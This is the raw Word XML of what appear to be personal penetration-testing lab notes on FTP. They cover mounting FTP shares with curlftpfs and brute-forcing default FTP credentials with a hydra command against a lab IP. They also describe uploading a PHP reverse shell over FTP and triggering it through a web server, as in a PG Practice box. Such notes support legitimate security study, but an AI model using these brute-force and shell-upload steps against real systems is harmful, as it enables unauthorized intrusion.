    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-E : Use Extended Regular Expressions (ERE), which allows more powerful regex patterns like | (alternation/or), +, {}, etc., without needing to escape them.</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zby2ogfu67wy" w:id="167"/>
      <w:bookmarkEnd w:id="167"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to mount FTP Server</w:t>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t xml:space="preserve">Sometimes, like with SMB, there are just way too many files and directories. So, we can just mount the FTP server to local Kali for easier enumeration.</w:t>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t xml:space="preserve">Install:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="733"/>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13BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="733"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install curlftpfs</w:t>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t xml:space="preserve">Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="762"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir ~/ftp-mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="762"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure it's empty if you already made it before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="762"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> curlftpfs ftp://user:password@host ~/ftp-mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="762"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This mounts the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ENTIRE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP to ~/ftp-mount</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="762"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curlftpfs ftp://user:pass@ftp.example.com/pub/data ~/ftp_mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="762"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This mount </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (/pub/data) to Kali</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qx59wzt5px83" w:id="168"/>
      <w:bookmarkEnd w:id="168"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce default creds (without any previous info)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2781300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="335" name="image341.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image341.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37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3CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId378">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</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3CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was the first time I've seen someone just fully bruteforce FTP with default credentials. And it found some</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the wordlist: </w:t>
      </w:r>
      <w:hyperlink r:id="rId379">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/govolution/betterdefaultpasslist/blob/master/ftp.txt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CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -C ftp.txt 192.168.115.93 ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2819400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="327" name="image313.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image313.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38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3D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="740"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId381">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">AuthBy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3D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="740"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the wordlist: </w:t>
      </w:r>
      <w:hyperlink r:id="rId382">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/govolution/betterdefaultpasslist/blob/master/ftp.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="740"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -C ftp.txt 192.168.115.93 ftp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tzquv4559udo" w:id="169"/>
      <w:bookmarkEnd w:id="169"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive Mode</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get into passive mode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp -p 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why use -p?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because active mode often fails when:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The client is behind a NAT or firewall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The firewall blocks incoming connections from the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You're on TryHackMe, HackTheBox, or another pentesting platform where outgoing-only traffic is allowed</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are in passive mode and want to get out (or vice versa), you can toggle using this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="485"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passive</w:t>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive vs. Active Mode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">active mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the server connects back to the client, which can reveal information about the client's setup or be abused if the client has insecure services open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passive mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the client always initiates connections, which limits your ability to exploit or observe the client from the server side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e5x9mkcc9dq" w:id="170"/>
      <w:bookmarkEnd w:id="170"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading reverse shell to FTP, and then accessing it through a website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId383">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">AuthBy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw a web server which had the same files as the FTP server. So, once we got admin credentials for FTP, we put in a reverse shell file, and then accessed it through the web server to trigger reverse shell. A similar attack vector can be seen in the /var/ftp section below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First get a reverse shell into a file called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> php-cmd.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">put php-cmd.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1450"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access that file in the web server to trigger reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
